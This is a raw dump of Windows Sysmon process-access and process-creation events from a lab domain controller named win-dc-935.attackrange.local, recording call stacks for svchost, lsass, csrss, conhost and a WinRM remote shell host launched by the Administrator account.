13:54:06.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.149{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.149{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-9D00-000000009101}4940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.147{10ACEC4A-857E-5FCF-9C00-000000009101}4936C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.133{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.055{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.055{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.055{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.055{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.055{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.055{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-857D-5FCF-9900-000000009101}47844804C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-9B00-000000009101}5032C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 